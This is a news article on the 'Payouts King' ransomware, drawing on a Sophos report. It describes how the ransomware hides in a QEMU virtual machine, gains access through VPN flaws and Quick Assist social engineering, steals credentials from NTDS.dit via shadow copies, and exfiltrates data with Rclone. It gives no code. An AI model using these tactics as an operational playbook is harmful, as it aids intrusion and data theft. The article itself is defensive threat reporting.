New Delhi: A new and highly sophisticated trend in the global cybersecurity landscape has raised serious concerns. The ‘Payouts King’ ransomware no longer relies on conventional attack techniques; instead, it hides within virtual machines (VMs), making it extremely difficult for modern endpoint security solutions to detect its presence. A recent report by cybersecurity firm Sophos has revealed detailed insights into this complex attack method.
According to the report, attackers are leveraging the open-source virtualization tool QEMU to deploy hidden virtual machines within compromised systems. Since most security tools are limited to scanning the host environment, they cannot inspect activities within these VMs. This allows threat actors to execute malicious payloads, store stolen data, and operate undetected for extended periods.
FCRF Returns With CDPO, Its Premier Data Protection Certification for Privacy Professionals
Full Attack Infrastructure Hidden Inside Alpine Linux VM
Investigations show that attackers create a scheduled task named ‘TPMProfiler,’ which runs with SYSTEM privileges and launches a concealed VM. This virtual machine operates on Alpine Linux and comes preloaded with multiple malicious tools. These include AdaptixC2, Chisel, BusyBox, and Rclone, which are used for remote command execution, data transfer, and network tunneling.
To avoid suspicion, attackers disguise virtual disk files as database or DLL files, making them appear legitimate within the system. They then establish covert SSH tunnels, enabling remote access and communication between the infected machine and external servers.
Initial Access via VPN Exploits and Social Engineering
The ransomware operators use multiple entry points to infiltrate networks. These include exposed VPN systems such as SonicWall and Cisco SSL VPN, as well as vulnerabilities in software like SolarWinds Web Help Desk.
In more recent attacks, social engineering tactics have been observed. Attackers impersonate IT support personnel and contact employees via Microsoft Teams, convincing them to install Quick Assist. Once access is granted, attackers gain full control over the system.
Data Theft and Deep Network Compromise
After gaining entry, attackers use Volume Shadow Copy Service (VSS) tools to create backups and extract critical system files such as NTDS.dit, SAM, and SYSTEM registries. This enables them to harvest credentials and gain control over the entire network.
Stolen data is then exfiltrated to remote servers using Rclone. In several cases, attackers have conducted advanced operations such as Active Directory mapping, user enumeration, and Kerberos-based attacks to deepen their access.
Links to BlackBasta Ransomware Group
Another report suggests that ‘Payouts King’ may be linked to former members of the BlackBasta gang. The attack techniques—such as spam bombing, phishing, and misuse of Quick Assist—closely resemble tactics previously used by BlackBasta operators.
The ransomware employs strong encryption methods, including AES-256 and RSA-4096, making data recovery nearly impossible without decryption keys. It also uses intermittent encryption for large files to speed up the attack.
Expert Warning and Prevention Measures
Cybersecurity experts warn that this approach represents a major challenge for traditional defense systems. Organizations are advised to monitor for unauthorized QEMU installations, suspicious scheduled tasks running with SYSTEM privileges, unusual SSH tunneling, and abnormal network traffic.
“This is a dangerous evolution where attackers exploit blind spots in security systems. Malware hidden inside virtual machines signals a new wave of advanced cyber threats,” a cybersecurity analyst noted.
Experts recommend adopting multi-layered security strategies, timely patch management, and continuous employee awareness training to effectively defend against such sophisticated ransomware attacks.
